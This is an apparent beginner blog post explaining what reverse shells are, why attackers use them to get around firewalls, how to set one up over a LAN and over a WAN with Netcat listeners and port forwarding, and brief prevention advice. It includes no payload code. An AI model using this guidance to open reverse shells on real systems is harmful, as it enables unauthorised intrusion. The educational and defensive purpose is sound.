Table of contents
- What is a shell
- What is a reverse shell
- Why do attackers/hackers need a reverse shell
- Difference between attacking over WAN and LAN
- preventing reverse shell
What is a shell?
First, we have to know what is a shell before moving on to the reverse shell. Is that a shell like the one on the back of a turtle? that is not the case, but it is named a shell because it is the outermost layer around the operating system. What does a shell do? A shell is a program that translates our commands to the operating system. That is an interface between OS and a user. It takes input which is commands or keywords from the keyboard and gives it to the OS, and the terminal/CLI (command line interface) lets you type commands and interact with the shell. There are more deep thoughts about the shell, but I won’t be stating them since this blog will mainly focus on the reverse shell.
What is a reverse shell?
I bet you have heard of this term quite a lot in tutorial videos and CTFs but don’t know the meaning of them yet. This is the right place for you. The meaning of a reverse shell is in the name. It does the opposite of what a normal remote connection does — the user which is a client connecting the server which is a target for attackers mostly. The server listens for connections from users on specific ports. For example, a web server will listen on port 443 for incoming connection so that it can provide the service that the user wants which is a website. How does reverse shell do it opposite? in reverse shell cases, the server initiates a remote connection and the user which is an attacker will listen on the port that the server will try to connect to. For instance, a reverse shell payload is injected into the web server. In that payload, you might see your laptop or PC IP address and port number that you want the server to connect to. let’s say 192.168.1.1 and the port is 4444 in the payload. Before you even inject the payload, you will have to listen on that port by using tools like Netcat. After you have injected it, you will get the connection from the server to your device.
Why do attackers need a reverse shell?
Why do attackers need them? Generally speaking, it is because of the firewall. The firewall limits the incoming traffic that is sent by the attacker to the server, but it does not limit the outgoing traffic that the server sends to users/attackers. Attacked servers usually allow connections only on specific ports. For example, a dedicated web server will only accept connections on ports 80 and 443. This means that there is no possibility to establish a shell listener on the attacked server.
On the other hand, firewalls usually do not limit outgoing connections at all. Therefore, an attacker can create the reverse connection by setting up the listener, and the server will act like a user in this case, then send the traffic to the attacker. All that the attacker needs is a machine that has the IP address and a tool such as Netcat to create the listener and bind shell access to it.
Difference between attacking over WAN and LAN
Establishing the reverse shell over the LAN is pretty simple. You just need to know your private IP address and the victim’s private IP address. Let’s say, you are in 192.168.1.0 network, and your IP address is 192.168.1.10; the victim’s IP address is 192.168.1.20. Now, you will get the connection by injecting a payload with your IP address in it and the port that you want the victim to connect to.
How about WAN? This is where it gets a little bit complicated. What we have to do is replace our private IP with public IP which you can find on google by searching like this: “what is my public IP address”. Are we done here? Not really, but we are one step closer. Let’s say, you already get a way or find a vulnerability to inject a payload of reverse shell into the server. The victim/attacked server will try to connect to your public IP address because you put your public IP in your payload. The request that the victim sends will come to your router before your listener on your machine. Your router must know where to forward that request to devices that are connected to the router. It can be done by enabling Port Forwarding on your router, but you have to google how to do it on your router since there are so many different types of routers out there made by various vendors.
This attack has less workload if your public IP address is static, which is not necessary and not common. The public IP for your router provided by your ISP may or may not be static. Dynamic IP address is what we usually have in common with public IP. Dynamic IP means your public IP will change whenever you re-establish your connection to the internet(restarting the router etc.). In this case, your previous IP written in the payload is of no use. But there are still more creative ways and other ways to do it differently than this method.
here is a reverse shell cheat sheet for you all.
How to prevent it?
The best way to avoid reverse shells is to protect against attacks that allow impostors to gain shell access in the first place. You can disable most tools that make it possible to create a reverse shell. As you can see above from the cheat sheet, reverse shells can be created using different tools and languages. Therefore, you may make it more difficult for the attacker, but not impossible.
My Twitter: https://twitter.com/Ayt06153394
Reference
Wikipedia contributors. (2022, October 18). Shellcode. Wikipedia. https://en.wikipedia.org/wiki/Shellcode
Nidecki. (2019, August 26). What Is a Reverse Shell. Acunetix. https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/
GeeksforGeeks. (2022, September 27). Difference Between Bind Shell and Reverse Shell. https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/
